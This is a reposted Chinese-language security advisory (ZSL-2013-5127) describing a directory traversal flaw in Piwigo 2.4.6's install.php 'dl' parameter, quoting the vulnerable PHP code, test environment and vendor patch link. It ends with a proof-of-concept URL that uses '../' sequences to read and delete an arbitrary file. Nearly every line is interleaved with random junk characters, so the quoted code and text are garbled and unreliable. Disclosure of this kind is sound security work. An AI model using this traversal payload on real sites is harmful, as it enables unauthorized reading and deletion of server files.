Piwigo是用PHP编写的相册脚本。0 B4 A5 T: G. |* U. {
8 x) m$ ~3 ?' xPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
/ c1 P0 M. c8 l/ a( r====================================================================* `: y8 ^* r+ K
/install.php:6 ]8 B. F# C5 I$ _: e
-------------
2 B, E0 k. \0 a4 x! w5 J7 C4 f; K113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
: ?* b4 }) @# f0 d3 E: j114: {/ Q" [! m6 e6 B8 n1 x
115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
1 K; _* b7 o# E! e# t! {- H116: header('Cache-Control: no-cache, must-revalidate');
' a/ e) G* z- K R" j117: header('Pragma: no-cache');
9 }: [0 C' }4 j1 r118: header('Content-Disposition: attachment; filename="database.inc.php"');
/ N+ `% v- i3 m3 u* u: r- G" D; ]119: header('Content-Transfer-Encoding: binary');
( s2 D9 h2 ~0 X T120: header('Content-Length: '.filesize($filename));
$ t$ e; F) U& M2 H: H& W" I5 Q121: echo file_get_contents($filename);# y; r1 Y6 o! \0 `6 o
122: unlink($filename);
, }& y" w* _- x! ^. G3 [2 s& _123: exit(); T9 b) }% j/ y5 q, P
124: }
; ]# V9 y. C0 \====================================================================, j! J3 g) P2 |7 o V/ h: Q! b
& r1 b. L: p! m, o% m. F
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
K( `/ [# W! x5 O5 T2 {" n Apache 2.4.2 (Win32)6 g0 O3 w7 X( S9 V% \
PHP 5.4.44 W" D* K1 a4 X) Q
MySQL 5.5.25a* O: \& I1 D n! \& Q6 O# r3 Y* W
`% h" ^" j) _) Z) w
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
3 \& ~6 i# m/ R4 B @zeroscience. ~& z7 {+ l9 i) E. Z. |1 s& t5 b
% s; F6 S& i5 E" v: g: ~. y6 i( X
Advisory ID: ZSL-2013-5127/ e3 ~6 ?8 a8 w9 W: Z
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
4 X, R5 u( P. x4 N8 cVendor Patch: http://piwigo.org/bugs/view.php?id=2843+ W( [3 O5 ]% I c
: ]6 X. D. `4 L/ L15.02.2013) X% N' O% i( r# h
5 U [6 W/ l! }6 D
--
5 u, q0 D" p0 [http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
7 P* ~* f+ }* v6 P9 \1 a6 k $ d9 U" Q# K( @ [7 S- D# K
|